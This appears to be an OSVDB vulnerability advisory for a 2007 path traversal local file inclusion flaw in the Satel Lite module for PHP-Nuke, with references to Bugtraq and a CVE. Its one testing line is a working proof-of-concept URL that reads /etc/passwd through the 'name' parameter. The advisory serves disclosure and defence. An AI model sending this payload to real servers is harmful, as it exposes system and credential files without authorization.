Satel Lite for PHP-Nuke Satellite.php name Variable Traversal Local File Inclusion

2007-03-26T11:27:27
ID OSVDB:35183
Type osvdb
Reporter rUnViRuS()
Modified 2007-03-26T11:27:27

Description

Manual Testing Notes

http://[target]/nuke_path/Satellite.php?op=modload&name=../../../../../../etc/passwd&file=index

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0334.html Mail List Post: http://www.securityfocus.com/archive/1/archive/1/463828/100/0/threaded CVE-2007-3332 Bugtraq ID: 23143